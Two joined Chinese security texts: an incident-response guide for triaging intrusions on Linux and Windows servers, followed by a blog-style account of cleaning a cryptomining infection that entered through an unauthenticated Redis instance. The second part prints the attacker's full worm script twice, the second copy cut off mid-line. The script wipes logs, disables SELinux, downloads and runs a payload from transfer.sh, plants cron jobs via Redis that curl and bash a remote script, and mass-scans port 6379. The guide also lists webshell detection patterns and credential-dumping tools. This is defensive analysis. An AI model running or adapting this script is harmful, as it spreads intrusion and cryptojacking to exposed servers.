行文仓促，不足之处，还望大牛指正。 1 事件分类 常见的安全事件： Web入侵：挂马、篡改、Webshell 系统入侵：系统异常、RDP爆破、SSH爆破、主机漏洞 病毒木马：远控、后门、勒索软件 信息泄漏：拖裤、数据库登录（弱口令） 网络流量：频繁发包、批量请求、DDOS攻击 2 排查思路 一个常规的入侵事件后的系统排查思路： 文件分析   a) 文件日期、新增文件、可疑/异常文件、最近使用文件、浏览器下载文件   b) Webshell 排查与分析   c) 核心应用关联目录文件分析 进程分析   a) 当前活动进程 & 远程连接   b) 启动进程&计划任务   c) 进程工具分析       i. Windows:Pchunter       ii. Linux: Chkrootkit&Rkhunter 系统信息   a) 环境变量   b) 帐号信息   c) History   d) 系统配置文件 日志分析   a) 操作系统日志       i. Windows: 事件查看器（eventvwr）       ii. Linux: /var/log/   b) 应用日志分析       i. Access.log       ii. Error.log 3 分析排查 3.1 Linux系列分析排查 3.1.1 文件分析 敏感目录的文件分析（类/tmp目录，命令目录/usr/bin /usr/sbin）   例如:   查看tmp目录下的文件： ls –alt /tmp/   查看开机启动项内容：ls -alt /etc/init.d/   查看指定目录下文件时间的排序：ls  -alt  | head -n 10   针对可疑文件可以使用stat进行创建修改时间、访问时间的详细查看，若修改时间距离事件日期接近，有线性关联，说明可能被篡改或者其他。 新增文件分析   例如要查找24小时内被修改的JSP文件： find ./ -mtime 0 -name "*.jsp"   （最后一次修改发生在距离当前时间n24小时至(n+1)24 小时）   查找72小时内新增的文件find / -ctime -2   PS：-ctime 内容未改变权限改变时候也可以查出   根据确定时间去反推变更的文件   ls -al /tmp | grep "Feb 27" 特殊权限的文件   查找777的权限的文件   find  /  *.jsp  -perm 4777   隐藏的文件（以 "."开头的具有隐藏属性的文件） 在文件分析过程中，手工排查频率较高的命令是 find grep ls 核心目的是为了关联推理出可疑文件。 3.1.2 进程命令 使用netstat 网络连接命令，分析可疑端口、可疑IP、可疑PID及程序进程    netstat –antlp | more 使用ps命令，分析进程 ps aux | grep pid | grep –v grep 将netstat与ps 结合，可参考vinc牛的案例： （可以使用lsof -i:1677 查看指定端口对应的程序） 使用ls 以及 stat 查看系统命令是否被替换。   两种思路：第一种查看命令目录最近的时间排序，第二种根据确定时间去匹配。   ls -alt /usr/bin   | head -10   ls -al /bin /usr/bin /usr/sbin/ /sbin/ | grep "Jan 15" PS：如果日期数字<10，中间需要两个空格。比如1月1日，grep “Jan  1” 隐藏进程查看 ps -ef | awk '{print}' | sort -n | uniq >1 ls /proc | sort -n |uniq >2 diff 1 2 3.1.3 系统信息 history (cat /root/.bash_history) /etc/passwd crontab  /etc/cron* rc.local  /etc/init.d chkconfig last $PATH strings 查看分析history (cat /root/.bash_history)，曾经的命令操作痕迹，以便进一步排查溯源。运气好有可能通过记录关联到如下信息：    a) wget 远程某主机（域名&IP）的远控文件；    b) 尝试连接内网某主机（ssh scp），便于分析攻击者意图;    c) 打包某敏感数据或代码，tar zip 类命令    d) 对系统进行配置，包括命令修改、远控木马类，可找到攻击者关联信息… 查看分析用户相关分析   a) useradd userdel 的命令时间变化（stat），以及是否包含可疑信息   b) cat /etc/passwd 分析可疑帐号，可登录帐号   查看UID为0的帐号：awk -F: '{if($3==0)print $1}' /etc/passwd   查看能够登录的帐号：cat /etc/passwd  | grep -E "/bin/bash$"   PS：UID为0的帐号也不一定都是可疑帐号，Freebsd默认存在toor帐号，且uid为0.（toor 在BSD官网解释为root替代帐号，属于可信帐号） 查看分析任务计划    a) 通过crontabl –l 查看当前的任务计划有哪些，是否有后门木马程序启动相关信息；    b) 查看etc目录任务计划相关文件，ls /etc/cron* 查看linux 开机启动程序    a) 查看rc.local文件（/etc/init.d/rc.local     /etc/rc.local）    b) ls –alt /etc/init.d/    c) chkconfig 查看系统用户登录信息    a) 使用lastlog命令，系统中所有用户最近一次登录信息。    b) 使用lastb命令，用于显示用户错误的登录列表    c) 使用last命令，用于显示用户最近登录信息（数据源为/var/log/wtmp，var/log/btmp）        utmp文件中保存的是当前正在本系统中的用户的信息。        wtmp文件中保存的是登录过本系统的用户的信息。        /var/log/wtmp 文件结构和/var/run/utmp 文件结构一样，都是引用/usr/include/bits/utmp.h 中的struct utmp 系统路径分析    a) echo $PATH 分析有无敏感可疑信息 指定信息检索    a) strings命令在对象文件或二进制文件中查找可打印的字符串    b) 分析sshd 文件，是否包括IP信息strings /usr/bin/.sshd | egrep '[1-9]{1,3}.[1-9]{1,3}.'    PS：此正则不严谨，但匹配IP已够用    c) 根据关键字匹配命令内是否包含信息（如IP地址、时间信息、远控信息、木马特征、代号名称） 查看ssh相关目录有无可疑的公钥存在。    a) Redis（6379） 未授权恶意入侵，即可直接通过redis到目标主机导入公钥。    b) 目录： /etc/ssh    ./.ssh/ 3.1.4 后门排查 除以上文件、进程、系统 分析外，推荐工具：     chkrootkit  rkhunter（www.chkrootkit.org   rkhunter.sourceforge.net） Ø chkrootkit (迭代更新了20年)主要功能： 检测是否被植入后门、木马、rootkit 检测系统命令是否正常 检测登录日志 详细参考README Ø rkhunter主要功能： 系统命令（Binary）检测，包括Md5 校验 Rootkit检测 本机敏感目录、系统配置、服务及套间异常检测 三方应用版本检测 Ø RPM check检查 系统完整性也可以通过rpm自带的-Va来校验检查所有的rpm软件包,有哪些被篡改了,防止rpm也被替换,上传一个安全干净稳定版本rpm二进制到服务器上进行检查 ./rpm -Va > rpm.log 如果一切均校验正常将不会产生任何输出。如果有不一致的地方，就会显示出来。输出格式是8位长字符串,  c 用以指配置文件, 接着是文件名. 8位字符的每一个 用以表示文件与RPM数据库中一种属性的比较结果 。 . (点) 表示测试通过。.下面的字符表示对RPM软件包进行的某种测试失败： 5 MD5 校验码 S 文件尺寸 L 符号连接 T 文件修改日期 D 设备 U 用户 G 用户组 M 模式e (包括权限和文件类型) 借用sobug文章案例：如下图可知ps, pstree, netstat, sshd等等系统关键进程被篡改了 Ø Webshell查找     Webshell的排查可以通过文件、流量、日志三种方式进行分析，基于文件的命名特征和内容特征，相对操作性较高，在入侵后应急过程中频率也比较高。 可根据webshell特征进行命令查找，简单的可使用(当然会存在漏报和误报) find /var/www/ -name "*.php" |xargs egrep 'assert|phpspy|c99sh|milw0rm|eval|\(gunerpress|\(base64_decoolcode|spider_bc|shell_exec|passthru|\(\$\_\POST\[|eval \(str_rot13|\.chr\(|\$\{\"\_P|eval\(\$\_R|file_put_contents\(\.\*\$\_|base64_decode' Webshell的排查可以通过 Github上存在各种版本的webshell查杀脚本，当然都有自己的特点，可使用河马shell查杀（shellpub.com） 综上所述，通过chkrootkit 、rkhunter、RPM check、Webshell Check 等手段得出以下应对措施： 根据进程、连接等信息关联的程序，查看木马活动信息。 假如系统的命令（例如netstat ls 等）被替换，为了进一步排查，需要下载一新的或者从其他未感染的主机拷贝新的命令。 发现可疑可执行的木马文件，不要急于删除，先打包备份一份。 发现可疑的文本木马文件，使用文本工具对其内容进行分析，包括回连IP地址、加密方式、关键字（以便扩大整个目录的文件特征提取）等。 3.1.5 日志分析    日志文件 /var/log/message       包括整体系统信息 /var/log/auth.log        包含系统授权信息，包括用户登录和使用的权限机制等 /var/log/userlog         记录所有等级用户信息的日志。 /var/log/cron           记录crontab命令是否被正确的执行 /var/log/xferlog(vsftpd.log)记录Linux FTP日志 /var/log/lastlog         记录登录的用户，可以使用命令lastlog查看 /var/log/secure         记录大多数应用输入的账号与密码，登录成功与否 var/log/wtmp　　      记录登录系统成功的账户信息，等同于命令last var/log/faillog　　      记录登录系统不成功的账号信息，一般会被黑客删除    日志查看分析，grep,sed,sort,awk综合运用 基于时间的日志管理：    /var/log/wtmp    /var/run/utmp    /var/log/lastlog(lastlog)    /var/log/btmp(lastb) 登录日志可以关注Accepted、Failed password 、invalid特殊关键字 登录相关命令       lastlog 记录最近几次成功登录的事件和最后一次不成功的登录    who 命令查询utmp文件并报告当前登录的每个用户。Who的缺省输出包括用户名、终端类型、登录日期及远程主机    w 命令查询utmp文件并显示当前系统中每个用户和它所运行的进程信息    users 用单独的一行打印出当前登录的用户，每个显示的用户名对应一个登录会话。如果一个用户有不止一个登录会话，那他的用户名把显示相同的次数    last 命令往回搜索wtmp来显示自从文件第一次创建以来登录过的用户    finger 命令用来查找并显示用户信息，系统管理员通过使用该命令可以知道某个时候到底有多少用户在使用这台Linux主机。    几个语句       定位有多少IP在爆破主机的root帐号    grep "Failed password for root" /var/log/auth.log | awk '{print $11}' | sort | uniq -c | sort -nr | more    登录成功的IP有哪些    grep "Accepted " /var/log/auth.log | awk '{print $11}' | sort | uniq -c | sort -nr | more      tail -400f demo.log #监控最后400行日志文件的变化 等价与 tail -n 400 -f （-f参数是实时）      less demo.log #查看日志文件，支持上下滚屏，查找功能      uniq -c demo.log  #标记该行重复的数量，不重复值为1    grep -c 'ERROR' demo.log   #输出文件demo.log中查找所有包行ERROR的行的数量    3.1.6 相关处置 kill -9 chattr –i rm setfacl ssh chmod 3.2 Windows系列分析排查 3.2.1 文件分析 开机启动有无异常文件 各个盘下的temp(tmp)相关目录下查看有无异常文件 浏览器浏览痕迹、浏览器下载文件、浏览器cookie信息 查看文件时间，创建时间、修改时间、访问时间。对应linux的ctime mtime atime，通过对文件右键属性即可看到详细的时间（也可以通过dir /tc 1.aspx 来查看创建时间），黑客通过菜刀类工具改变的是修改时间。所以如果修改时间在创建时间之前明显是可疑文件。 查看用户recent相关文件，通过分析最近打开分析可疑文件    a) C:\Documents and Settings\Administrator\Recent    b) C:\Documents and Settings\Default User\Recent    c) 开始,运行   %UserProfile%\Recent 根据文件夹内文件列表时间进行排序，查找可疑文件。当然也可以搜索指定日期范围的文件及文件件 Server 2008 R2系列 Win10 系列 关键字匹配，通过确定后的入侵时间，以及webshell或js文件的关键字（比如博彩类），可以在IIS 日志中进行过滤匹配，比如经常使用:    知道是上传目录，在web log 中查看指定时间范围包括上传文件夹的访问请求    findstr /s /m /I “UploadFiles” *.log    某次博彩事件中的六合彩信息是six.js    findstr /s /m /I “six.js” *.aspx    根据shell名关键字去搜索D盘spy相关的文件有哪些    for /r d:\ %i in (*spy*.aspx) do @echo %i    ``` 3.2.2 进程命令 netstat -ano 查看目前的网络连接，定位可疑的ESTABLISHED 根据netstat 定位出的pid，再通过tasklist命令进行进程定位 通过tasklist命令查看可疑程序 3.2.3 系统信息 使用set命令查看变量的设置 Windows 的计划任务； Windows 的帐号信息，如隐藏帐号等 配套的注册表信息检索查看，SAM文件以及远控软件类 查看systeminfo 信息，系统版本以及补丁信息    例如系统的远程命令执行漏洞MS08-067、MS09-001、MS17-010（永恒之蓝）…    若进行漏洞比对，建议使用Windows-Exploit-Suggester    https://github.com/GDSSecurity/Windows-Exploit-Suggester/ 3.2.4 后门排查 PC Hunter是一个Windows系统信息查看软件 http://www.xuetr.com/ 功能列表如下： 1.进程、线程、进程模块、进程窗口、进程内存信息查看，杀进程、杀线程、卸载模块等功能 2.内核驱动模块查看，支持内核驱动模块的内存拷贝 3.SSDT、Shadow SSDT、FSD、KBD、TCPIP、Classpnp、Atapi、Acpi、SCSI、IDT、GDT信息查看，并能检测和恢复ssdt hook和inline hook 4.CreateProcess、CreateThread、LoadImage、CmpCallback、BugCheckCallback、Shutdown、Lego等Notify Routine信息查看，并支持对这些Notify Routine的删除 5.端口信息查看，目前不支持2000系统 6.查看消息钩子 7.内核模块的iat、eat、inline hook、patches检测和恢复 8.磁盘、卷、键盘、网络层等过滤驱动检测，并支持删除 9.注册表编辑 10.进程iat、eat、inline hook、patches检测和恢复 11.文件系统查看，支持基本的文件操作 12.查看（编辑）IE插件、SPI、启动项、服务、Host文件、映像劫持、文件关联、系统防火墙规则、IME 13.ObjectType Hook检测和恢复 14.DPC定时器检测和删除 15.MBR Rootkit检测和修复 16.内核对象劫持检测 17.WorkerThread枚举 18.Ndis中一些回调信息枚举 19.硬件调试寄存器、调试相关API检测 20.枚举SFilter/Fltmgr的回调 PS：最简单的使用方法，根据颜色去辨识——可疑进程，隐藏服务、被挂钩函数：红色，然后根据程序右键功能去定位具体的程序和移除功能。根据可疑的进程名等进行互联网信息检索然后统一清除并关联注册表。 Webshell 排查 可以使用hm 也可以使用盾类（D盾、暗组盾），如果可以把web目录导出，可以在自己虚拟机进行分析 3.2.5 日志分析 打开事件管理器（开始—管理工具—事件查看/开始运行eventvwr） 主要分析安全日志，可以借助自带的筛选功能 可以把日志导出为文本格式，然后使用notepad++ 打开，使用正则模式去匹配远程登录过的IP地址，在界定事件日期范围的基础，可以提高效率正则是：    ((?:(?:25[0-5]|2[0-4]\d|((1\d{2})|([1-9]?\d))).){3}(?:25[0-5]|2[0-4]\d|((1\d{2})|([1-9]?\d))))    ``` 强大的日志分析工具Log Parser #分析IIS日志 LogParser.exe "select top 10 time, c-ip,cs-uri-stem, sc-status, time-taken from C:\Users\sm0nk\Desktop\iis.log" -o:datagrid 有了这些我们就可以对windows日志进行分析了 比如我们分析域控日志的时候，想要查询账户登陆过程中，用户正确，密码错误的情况，我们需要统计出源IP，时间，用户名时，我们可以这么写（当然也可以结合一些统计函数，分组统计等等）： LogParser.exe -i:EVT "SELECT TimeGenerated,EXTRACT\_TOKEN(Strings,0,'|') AS USERNAME,EXTRACT\_TOKEN(Strings,2,'|') AS SERVICE\_NAME,EXTRACT\_TOKEN(Strings,5,'|') AS Client_IP FROM 'e:\logparser\xx.evtx' WHERE EventID=675" 事件ID是很好的索引 Windows server 2008系列参考event ID： 4624 - 帐户已成功登录 4625 - 帐户登录失败 4648 - 试图使用明确的凭证登录（例如远程桌面） 3.2.6 相关处置 通过网络连接锁定的可疑进程，进行定位恶意程序后删除(taskkill) 木马查杀，可配合pchunter 进行进一步专业分析，使用工具功能进行强制停止以及删除 最后清理后，统一查看网络连接、进程、内核钩子等是否正常。 3.3 应用类 Apache、tomcat、Nginx、IIS 无论任何web服务器其实日志需要关注的东西是一致的，即access_log和error_log。一般在确定ip地址后，通过: find . access_log |grep xargs ip攻击地址 find . access_log| grep xargs 木马文件名 页面访问排名前十的IP cat access.log | cut -f1 -d " " | sort | uniq -c | sort -k 1 -r | head -10 页面访问排名前十的URL cat access.log | cut -f4 -d " " | sort | uniq -c | sort -k 1 -r | head -10 查看最耗时的页面 cat access.log | sort -k 2 -n -r | head 10 在对WEB日志进行安全分析时，可以按照下面两种思路展开，逐步深入，还原整个攻击过程。 首先确定受到攻击、入侵的时间范围，以此为线索，查找这个时间范围内可疑的日志，进一步排查，最终确定攻击者，还原攻击过程。 一般攻击者在入侵网站后，通常会上传一个后门文件，以方便自己以后访问。我们也可以以该文件为线索来展开分析。 4 应急总结 核心思路是“顺藤摸瓜” 碎片信息的关联分析 时间范围的界定以及关键操作时间点串联 Web入侵类，shell定位很重要 假设与求证 攻击画像与路线确认 5 渗透反辅 密码读取    a) Windows: Mimikatz    b) Linux: mimipenguin 帐号信息    a) 操作系统帐号    b) 数据库帐号    c) 应用帐号信息 敏感信息    a) 配置信息    b) 数据库信息    c) 服务端口信息    d) 指纹信息 滚雪球式线性拓展    a) 密码口令类拓展（远控）    b) 典型漏洞批量利用 常见的入侵方式Getshell方法    a) WEB入侵        i. 典型漏洞：注入Getshell , 上传Getshell，命令执行Getshell，文件包含Getshell，代码执行Getshell，编辑器getshell，后台管理Getshell，数据库操作Getshell        ii. 容器相关：Tomcat、Axis2、WebLogic等中间件弱口令上传war包等，Websphere、weblogic、jboss反序列化，Struts2代码执行漏洞，Spring命令执行漏洞    b) 系统入侵        i. SSH 破解后登录操作        ii. RDP 破解后登录操作        iii. MSSQL破解后远控操作        iv. SMB远程命令执行（MS08-067、MS17-010、CVE-2017-7494）    c) 典型应用        i. Mail暴力破解后信息挖掘及漏洞利用        ii. VPN暴力破解后绕过边界        iii. Redis 未授权访问或弱口令可导ssh公钥或命令执行        iv. Rsync 未授权访问类        v. Mongodb未授权访问类        vi. Elasticsearch命令执行漏洞        vii. Memcache未授权访问漏洞        viii. 服务相关口令（mysql ldap zebra squid vnc smb） 6 资源参考 https://www.waitalone.cn/linux-find-webshell.html http://vinc.top/category/yjxy/ http://www.shellpub.com/ http://linux.vbird.org/linux_security/0420rkhunter.php https://cisofy.com/download/lynis/ https://sobug.com/article/detail/27?from=message&isappinstalled=1 http://www.freebuf.com/articles/web/23358.html https://www.microsoft.com/en-us/download/details.aspx?id=24659 http://www.cnblogs.com/downmoon/archive/2009/09/02/1558409.html http://wooyun.jozxing.cc/static/drops/tips-7462.html http://bobao.360.cn/learning/detail/3830.html https://yq.aliyun.com/ziliao/65679 http://secsky.sinaapp.com/188.html http://blog.sina.com.cn/s/blog_d7058b150102wu07.html http://www.sleuthkit.org/autopsy/ 7 FAQ 应急需求有哪些分类：    a) 被谁入侵了？ 关联 攻击IP 攻击者信息    b) 怎么入侵的？ 关联 入侵时间轴、漏洞信息    c) 为什么被入侵？ 关联 行业特性、数据信息、漏洞信息    d) 数据是否被窃取？ 关联 日志审计    e) 怎么办？ 关联 隔离、排查分析、删马（解密）、加固、新运营 关于windows的日志工具（log parser）有无图形界面版？    Log Parser Lizard 是一款用Vc++.net写的logParser增强工具。主要有以下特点：    a) 封装了logParser命令，带图形界面，大大降低了LogParser的使用难度。    b) 集成了几个开源工具，如log4net等。可以对IIS logs\EventLogs\active directory\log4net\File Systems\T-SQL进行方便的查询。    c) 集成了Infragistics.UltraChart.Core.v4.3、Infragistics.Excel.v4.3.dll等，使查询结果可以方便的以图表或EXCEL格式展示。    d) 集成了常见的查询命令，范围包含六大模块:IIS    e) 可以将查询过的命令保存下来，方便再次使用。 PS:软件是比较老的，对新系统兼容性不好，还是建议微软原生态log parser 在linux日志中，有无黑客入侵后的操作命令的统计****    a) 可以根据history信息进行溯源分析，但一般可能会被清除    b) 还有方法是需要结合accton 和 lastcomm 3.2.3 提到了Windows-Exploit-Suggester，有无linux版？    Linux_Exploit_Suggester https://github.com/PenturaLabs/Linux_Exploit_Suggester 有无linux自动化信息收集的脚本工具？    LinEnum  https://github.com/rebootuser/LinEnum 有无综合的取证分析工具    Autopsy 是sleuthkit提供的平台工具，Windows 和 Linux磁盘映像静态分析、恢复被删文件、时间线分析，网络浏览历史，关键字搜索和邮件分析等功能     http://www.sleuthkit.org/autopsy/ 关于业务逻辑的排查方法说明 新型业务安全中安全事件，例如撞库、薅羊毛、支付、逻辑校验等敏感环节，未在本文体现，所以后续有必要针对业务侧的应急排查方法归纳。 阿里云顿先知 : https://xianzhi.aliyun.com/forum/read/1655.html

刚刚一关系不错的朋友在群里求助向他要了服务器密码后登上去看了眼，发现被挖矿了。。结束掉这个进程后发现没有死灰复燃，继续查。接着在root目录下发现了大量的隐藏文件。。查了下最近登陆和执行过的命令，没发现异常，由于服务器有redis，猜测是redis爆破进来的，跟他核实了下，他竟然没给redis加密码。。。XFTP连上后显示隐藏文件，发现了几个可疑的脚本，下载回本地后分析先从文件名最怪的脚本看起脚本内容如下：sleep 1 find . -maxdepth 1 -name ".mxff0" -type f -mmin +60 -delete [ -f .mxff0 ] && exit 0 echo 0 > .mxff0 trap "rm -rf .m* .cmd tmp.* .r .dat $0" EXIT setenforce 0 2>/dev/null echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null crontab -r 2>/dev/null rm -rf /var/spool/cron 2>/dev/null grep -q 8.8.8.8 /etc/resolv.conf || echo "nameserver 8.8.8.8" >> /etc/resolv.conf rm -rf /tmp/* 2>/dev/null rm -rf /var/tmp/* 2>/dev/null rm -rf /etc/root.sh 2>/dev/null sync && echo 3 > /proc/sys/vm/drop_caches cat <<EOF> /etc/security/limits.conf *         hard    nofile      100000 *         soft    nofile      100000 root      hard    nofile      100000 root      soft    nofile      100000 *         hard    nproc       100000 *         soft    nproc       100000 root      hard    nproc       100000 root      soft    nproc       100000 EOF iptables -I INPUT 1 -p tcp --dport 6379 -j DROP iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT ps xf | grep -v grep | grep "redis-server\|nicehash\|linuxs\|linuxl\|crawler.weibo\|243/44444\|cryptonight\|stratum\|gpg-daemon\|jobs.flu.cc\|nmap\|cranberry\|start.sh\|watch.sh\|krun.sh\|killTop.sh\|cpuminer\|/60009\|ssh_deny.sh\|clean.sh\|\./over\|mrx1\|redisscan\|ebscan\|redis-cli\|barad_agent\|\.sr0\|clay\|udevs\|\.sshd\|/tmp/init" | while read pid _; do kill -9 "$pid"; done rm -rf /tmp/* 2>/dev/null rm -rf /var/tmp/* 2>/dev/null echo 0 > /var/spool/mail/root echo 0 > /var/log/wtmp echo 0 > /var/log/secure echo 0 > /root/.bash_history YUM_PACKAGE_NAME="iptables gcc redis coreutils bash curl wget" DEB_PACKAGE_NAME="coreutils bash build-essential make gcc redis-server redis-tools redis iptables curl" if cat /etc/*release | grep -i CentOS; then yum clean all yum install -y -q epel-release yum install -y -q $YUM_PACKAGE_NAME elif cat /etc/*release | grep -qi Red; then yum clean all yum install -y -q epel-release yum install -y -q $YUM_PACKAGE_NAME elif cat /etc/*release | grep -qi Fedora; then yum clean all yum install -y -q epel-release yum install -y -q $YUM_PACKAGE_NAME elif cat /etc/*release | grep -qi Ubuntu; then export DEBIAN_FRONTEND=noninteractive rm -rf /var/lib/apt/lists/* apt-get update -q --fix-missing for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done elif cat /etc/*release | grep -qi Debian; then export DEBIAN_FRONTEND=noninteractive rm -rf /var/lib/apt/lists/* apt-get update --fix-missing for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done elif cat /etc/*release | grep -qi Mint; then export DEBIAN_FRONTEND=noninteractive rm -rf /var/lib/apt/lists/* apt-get update --fix-missing for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done elif cat /etc/*release | grep -qi Knoppix; then export DEBIAN_FRONTEND=noninteractive rm -rf /var/lib/apt/lists/* apt-get update --fix-missing for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done else exit 1 fi sleep 1 if ! ( [ -x /usr/local/bin/pnscan ] || [ -x /usr/bin/pnscan ] ); then curl -kLs https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12 > .x112 || wget -q -O .x112 https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12 sleep 1 [ -f .x112 ] && tar xf .x112 && cd pnscan-1.12 && make lnx && make install && cd .. && rm -rf pnscan-1.12 .x112 fi tname=$( mktemp ) OMURL=https://transfer.sh/ly9S0/tmp.5ErvacTPRm curl -s $OMURL > $tname || wget -q -O $tname $OMURL NMURL=$( curl -s --upload-file $tname https://transfer.sh ) mv $tname .gpg && chmod +x .gpg && ./.gpg && rm -rf .gpg [ -z "$NMURL" ] && NMURL=$OMURL ncmd=$(basename $(mktemp)) sed 's|'"$OMURL"'|'"$NMURL"'|g' < .cmd > $ncmd NSURL=$( curl -s --upload-file $ncmd https://transfer.sh ) echo 'flushall' > .dat echo 'config set dir /var/spool/cron' >> .dat echo 'config set dbfilename root' >> .dat echo 'set Backup1 "\t\n*/2 * * * * curl -s '${NSURL}' > .cmd && bash .cmd\n\t"' >> .dat echo 'set Backup2 "\t\n*/5 * * * * wget -O .cmd '${NSURL}' && bash .cmd\n\t"' >> .dat echo 'set Backup3 "\t\n*/10 * * * * lynx -source '${NSURL}' > .cmd && bash .cmd\n\t"' >> .dat echo 'save' >> .dat echo 'config set dir /var/spool/cron/crontabs' >> .dat echo 'save' >> .dat echo 'exit' >> .dat pnx=pnscan [ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan [ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscan for x in $( seq 1 224 | sort -R ); do for y in $( seq 0 255 | sort -R ); do $pnx -t512 -R '6f 73 3a 4c 69 6e 75 78' -W '2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a' $x.$y.0.0/16 6379 > .r.$x.$y.o awk '/Linux/ {print $1, $3}' .r.$x.$y.o > .r.$x.$y.l while read -r h p; do cat .dat | redis-cli -h $h -p $p --raw & done < .r.$x.$y.l done done echo 0 > /var/spool/mail/root 2>/dev/null echo 0 > /var/log/wtmp 2>/dev/null echo 0 > /var/log/secure 2>/dev/null echo 0 > /root/.bash_history 2>/dev/null exit 0这个脚本干了这么几件事：检测是否存在别的挖矿程序，有就结束并删除设置dns服务器修改防火墙规则（由于服务器是centos7，该操作并没有执行成功）结束redis等进程删除日志（坑爹呢？）下载安装iptables等软件下载pnscan（一款可以感染IOT设备的蠕虫）下载https://transfer.sh/GQCHp/tmp.pZR8v8kihR 并重命名为.gpg然后运行，运行后再删除自身设置定时任务用pnscan扫描全网6379端口设备随后执行了netstat -antp查看了网络连接尝试结束掉pnscan发现会重启进程，推测有进程守护用命令ps -ef|grep pnscan查看pnscan路径进入到/usr/local/bin目录后执行ls发现了这个东西静静的躺在那让我们用rm -rf pnscan送他最后一程最后一步清理战场由于/root目录下有大量的.r.x命名比较规则的文件，直接调用正则删除即可附几个root目录下的脚本：.cmd[与tmp.Nm1jfFNPap内容一样]:sleep 1 find . -maxdepth 1 -name ".mxff0" -type f -mmin +60 -delete [ -f .mxff0 ] && exit 0 echo 0 > .mxff0 trap "rm -rf .m* .cmd tmp.* .r .dat $0" EXIT setenforce 0 2>/dev/null echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null crontab -r 2>/dev/null rm -rf /var/spool/cron 2>/dev/null grep -q 8.8.8.8 /etc/resolv.conf || echo "nameserver 8.8.8.8" >> /etc/resolv.conf rm -rf /tmp/* 2>/dev/null rm -rf /var/tmp/* 2>/dev/null rm -rf /etc/root.sh 2>/dev/null sync && echo 3 > /proc/sys/vm/drop_caches cat <<EOF> /etc/security/limits.conf *         hard    nofile      100000 *         soft    nofile      100000 root      hard    nofile      100000 root      soft    nofile      100000 *         hard    nproc       100000 *         soft    nproc       100000 root      hard    nproc       100000 root      soft    nproc       100000 EOF iptables -I INPUT 1 -p tcp --dport 6379 -j DROP iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT ps xf | grep -v grep | grep "redis-server\|nicehash\|linuxs\|linuxl\|crawler.weibo\|243/44444\|cryptonight\|stratum\|gpg-daemon\|jobs.flu.cc\|nmap\|cranberry\|start.sh\|watch.sh\|krun.sh\|killTop.sh\|cpuminer\|/60009\|ssh_deny.sh\|clean.sh\|\./over\|mrx1\|redisscan\|ebscan\|redis-cli\|barad_agent\|\.sr0\|clay\|udevs\|\.sshd\|/tmp/init" | while read pid _; do kill -9 "$pid"; done rm -rf /tmp/* 2>/dev/null rm -rf /var/tmp/* 2>/dev/null echo 0 > /var/spool/mail/root echo 0 > /var/log/wtmp echo 0 > /var/log/secure echo 0 > /root/.bash_history YUM_PACKAGE_NAME="iptables gcc redis coreutils bash curl wget" DEB_PACKAGE_NAME="coreutils bash build-essential make gcc redis-server redis-tools redis iptables curl" if cat /etc/*release | grep -i CentOS; then yum clean all yum install -y -q epel-release yum install -y -q $YUM_PACKAGE_NAME elif cat /etc/*release | grep -qi Red; then yum clean all yum install -y -q epel-release yum install -y -q $YUM_PACKAGE_NAME elif cat /etc/*release | grep -qi Fedora; then yum clean all yum install -y -q epel-release yum install -y -q $YUM_PACKAGE_NAME elif cat /etc/*release | grep -qi Ubuntu; then export DEBIAN_FRONTEND=noninteractive rm -rf /var/lib/apt/lists/* apt-get update -q --fix-missing for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done elif cat /etc/*release | grep -qi Debian; then export DEBIAN_FRONTEND=noninteractive rm -rf /var/lib/apt/lists/* apt-get update --fix-missing for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done elif cat /etc/*release | grep -qi Mint; then export DEBIAN_FRONTEND=noninteractive rm -rf /var/lib/apt/lists/* apt-get update --fix-missing for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done elif cat /etc/*release | grep -qi Knoppix; then export DEBIAN_FRONTEND=noninteractive rm -rf /var/lib/apt/lists/* apt-get update --fix-missing for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done else exit 1 fi sleep 1 if ! ( [ -x /usr/local/bin/pnscan ] || [ -x /usr/bin/pnscan ] ); then curl -kLs https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12 > .x112 || wget -q -O .x112 https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12 sleep 1 [ -f .x112 ] && tar xf .x112 && cd pnscan-1.12 && make lnx && make install && cd .. && rm -rf pnscan-1.12 .x112 fi tname=$( mktemp ) OMURL=https://transfer.sh/GQCHp/tmp.pZR8v8kihR curl -s $OMURL > $tname || wget -q -O $tname $OMURL NMURL=$( curl -s --upload-file $tname https://transfer.sh ) mv $tname .gpg && chmod +x .gpg && ./.gpg && rm -rf .gpg [ -z "$NMURL" ] && NMURL=$OMURL ncmd=$(basename $(mktemp)) sed 's|'"$OMURL"'|'"$NMURL"'|g' < .cmd > $ncmd NSURL=$( curl -s --upload-file $ncmd https://transfer.sh ) echo 'flushall' > .dat echo 'config set dir /var/spool/cron' >> .dat echo 'config set dbfilename root' >> .dat echo 'set Backup1 "\t\n*/2 * * * * curl -s '${NSURL}' > .cmd && bash .cmd\n\t"' >> .dat echo 'set Backup2 "\t\n*/5 * * * * wget -O .cmd '${NSURL}' && bash .cmd\n\t"' >> .dat echo 'set Backup3 "\t\n*/10 * * * * lynx -source '${NSURL}' > .cmd && bash .cmd\n\t"' >> .dat echo 'save' >> .dat echo 'config set dir /var/spool/cron/crontabs' >> .dat echo 'save' >> .dat echo 'exit' >> .dat pnx=pnscan [ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan [ -x /usr/bin/pnscan ] && 